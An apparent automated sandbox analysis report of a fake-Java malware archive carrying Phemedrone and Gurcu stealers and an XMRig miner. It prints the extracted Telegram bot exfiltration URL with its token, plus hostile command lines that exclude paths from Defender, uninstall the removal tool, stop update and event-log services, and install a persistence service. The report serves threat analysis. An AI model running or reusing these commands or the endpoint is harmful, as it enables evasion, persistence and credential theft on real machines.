Analysis
- max time kernel: 76s
- max time network: 84s
- platform: windows10-ltsc 2021_x64
- resource: win10ltsc2021-20241023-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
- submitted: 23-11-2024 19:10
- Static task: static1
- URLScan task: urlscan1
- Behavioral task: behavioral1
- Sample: https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY
- Resource: win10ltsc2021-20241023-en
General
- Target: https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY
Malware Config
- Extracted: phemedrone
  https://api.telegram.org/bot7409385165:AAHDnOsiLDMwjv8rdk_VLf2May0J5Oj0YjI/sendDocument
- Extracted: gurcu
  https://api.telegram.org/bot7409385165:AAHDnOsiLDMwjv8rdk_VLf2May0J5Oj0YjI/sendDocumen
Signatures
- Gurcu family
- Phemedrone
  An information and wallet stealer written in C#.
- Phemedrone family
- Xmrig family
XMRig Miner payload 8 IoCs
Processes (resource, yara_rule):
- behavioral1/memory/6124-724-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-728-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-726-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-727-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-725-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-722-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-721-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
- behavioral1/memory/6124-734-0x0000000140000000-0x0000000140848000-memory.dmp: xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes (pid, process):
- 1132 powershell.exe, 2744 powershell.exe, 4940 powershell.exe, 5936 powershell.exe
Creates new service(s) 2 TTPs
Drops file in Drivers directory 2 IoCs
Processes (description, ioc, process):
- File created: C:\Windows\system32\drivers\etc\hosts (java8.exe)
- File created: C:\Windows\system32\drivers\etc\hosts (zrgqfbcavrkx.exe)
Executes dropped EXE 7 IoCs
Processes (pid, process):
- 5512 java8.exe, 5580 optionsof.exe, 4428 zrgqfbcavrkx.exe, 3368 java8.exe, 5452 optionsof.exe, 5816 zrgqfbcavrkx.exe, 3532 zrgqfbcavrkx.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes (pid, process):
- 5916 powercfg.exe, 5908 powercfg.exe, 5900 powercfg.exe, 2852 powercfg.exe, 5852 powercfg.exe, 5880 powercfg.exe, 5660 powercfg.exe, 5892 powercfg.exe
Drops file in System32 directory 6 IoCs
Processes (description, ioc, process):
- File opened for modification: C:\Windows\system32\MRT.exe (java8.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification: C:\Windows\system32\MRT.exe (zrgqfbcavrkx.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of SetThreadContext 2 IoCs
Processes (description, pid, process, target process):
- PID 4428 set thread context of 6092: 4428 zrgqfbcavrkx.exe, target conhost.exe
- PID 4428 set thread context of 6124: 4428 zrgqfbcavrkx.exe, target svchost.exe
Processes (resource, yara_rule):
- behavioral1/memory/6124-717-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-724-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-728-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-726-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-727-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-725-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-722-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-721-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-720-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-719-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-718-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-716-0x0000000140000000-0x0000000140848000-memory.dmp: upx
- behavioral1/memory/6124-734-0x0000000140000000-0x0000000140848000-memory.dmp: upx
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes (pid, process):
- 5720 sc.exe, 5712 sc.exe, 5736 sc.exe, 5936 sc.exe, 5940 sc.exe, 6088 sc.exe, 5612 sc.exe, 5576 sc.exe, 3116 sc.exe, 5536 sc.exe, 5840 sc.exe, 5660 sc.exe, 5756 sc.exe, 3272 sc.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A (taskmgr.exe)
- Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName (taskmgr.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 (taskmgr.exe)
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (firefox.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
- Key opened: \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (perfmon.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (perfmon.exe)
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Software\Microsoft\Internet Explorer\TypedURLs (taskmgr.exe)
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 2 IoCs
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings (7zFM.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings (firefox.exe)
NTFS ADS 2 IoCs
Processes (description, ioc, process):
- File created: C:\Users\Admin\AppData\Local\Temp\7zO0E198148\pass - 1512okul.txt:Zone.Identifier (7zFM.exe)
- File created: C:\Users\Admin\Downloads\infected-fakejava.rar:Zone.Identifier (firefox.exe)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes (pid, process):
- 4576 7zFM.exe, 4568 perfmon.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of SetWindowsHookEx 4 IoCs
Processes (pid, process):
- 2540 firefox.exe, 2540 firefox.exe, 2540 firefox.exe, 2540 firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Program Files\Mozilla Firefox\firefox.exe (PID 2592)
  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY"
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Mozilla Firefox\firefox.exe (PID 2540)
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://mega.nz/file/EKFwCaRB#J19QSuEgyXGyyczLkke2_yvkIJEjR9UJugXIuLcHDZY
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 4272)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc8d2628-0abc-4e38-860b-699d916f7c51} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" gpu
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 1928)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24601 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {33311f25-d0de-4c04-921b-10be1f4e5ffb} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" socket
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 5024)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3128 -childID 1 -isForBrowser -prefsHandle 3120 -prefMapHandle 3116 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7636a4f4-a985-4f48-9555-aa57967d5ad9} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 2668)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 2 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d717ebd1-d36a-4d43-bcdc-f94e4b63149e} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 4872)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4428 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4520 -prefMapHandle 4512 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ede66de4-e1e8-4c34-a884-3d85eea3b5c7} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" utility
      - Checks processor information in registry
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 3300)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4820 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94ebdeca-e885-4587-842d-628cabe4635c} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 4952)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 4 -isForBrowser -prefsHandle 5688 -prefMapHandle 5684 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7caaee1a-c5ce-4461-907c-a9f9e762a43b} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 4524)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5880 -prefMapHandle 5884 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a769583d-f9af-4fce-9515-d4edcbccfeff} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
    - C:\Program Files\Mozilla Firefox\firefox.exe (PID 600)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6228 -childID 6 -isForBrowser -prefsHandle 6376 -prefMapHandle 6120 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 916 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0eb9272-1e1a-4ed6-b390-e4af57d0b08a} 2540 "\\.\pipe\gecko-crash-server-pipe.2540" tab
- C:\Windows\system32\AUDIODG.EXE (PID 4640)
  Command line: C:\Windows\system32\AUDIODG.EXE 0x490 0x414
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\rundll32.exe (PID 4100)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Program Files\7-Zip\7zFM.exe (PID 4576)
  Command line: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\infected-fakejava.rar"
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - C:\Windows\system32\NOTEPAD.EXE (PID 2512)
    Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0E198148\pass - 1512okul.txt
- C:\Program Files\7-Zip\7zFM.exe (PID 5140)
  Command line: "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\java.rar"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
- C:\Users\Admin\Desktop\java8.exe (PID 5512)
  Command line: "C:\Users\Admin\Desktop\java8.exe"
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 1132)
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 5440)
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    - C:\Windows\system32\wusa.exe (PID 5752)
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
  - C:\Windows\system32\sc.exe (PID 5536)
    Command line: C:\Windows\system32\sc.exe stop UsoSvc
    - Launches sc.exe
  - C:\Windows\system32\sc.exe (PID 5736)
    Command line: C:\Windows\system32\sc.exe stop WaaSMedicSvc
    - Launches sc.exe
  - C:\Windows\system32\sc.exe (PID 5576)
    Command line: C:\Windows\system32\sc.exe stop wuauserv
    - Launches sc.exe
  - C:\Windows\system32\sc.exe (PID 5840)
    Command line: C:\Windows\system32\sc.exe stop bits
    - Launches sc.exe
  - C:\Windows\system32\sc.exe (PID 5660)
    Command line: C:\Windows\system32\sc.exe stop dosvc
    - Launches sc.exe
  - C:\Windows\system32\powercfg.exe (PID 5892)
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\powercfg.exe
    Command line: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5900
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5908
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RLNALEWN"2⤵
- Launches sc.exe
PID:5936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"2⤵
- Launches sc.exe
PID:5940
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:6088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RLNALEWN"2⤵
- Launches sc.exe
PID:5612
-
-
C:\Users\Admin\Desktop\optionsof.exe"C:\Users\Admin\Desktop\optionsof.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5984 -
C:\Windows\system32\resmon.exe"C:\Windows\system32\resmon.exe"2⤵PID:5200
-
C:\Windows\System32\perfmon.exe"C:\Windows\System32\perfmon.exe" /res3⤵
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exeC:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4428 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5644
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2488
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3272
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3116
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5660
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5880
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:2852
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:6092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4940
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"3⤵
- Executes dropped EXE
PID:5816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5936
-
-
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe"3⤵
- Executes dropped EXE
PID:3532
-
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:6124
-
-
C:\Users\Admin\Desktop\java8.exe"C:\Users\Admin\Desktop\java8.exe"1⤵
- Executes dropped EXE
PID:3368
-
C:\Users\Admin\Desktop\optionsof.exe"C:\Users\Admin\Desktop\optionsof.exe"1⤵
- Executes dropped EXE
PID:5452
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- System Services (2)
- Service Execution (2)
Credential Access
- Credentials from Password Stores (1)
- Credentials from Web Browsers (1)
- Unsecured Credentials (3)
- Credentials In Files (3)
Downloads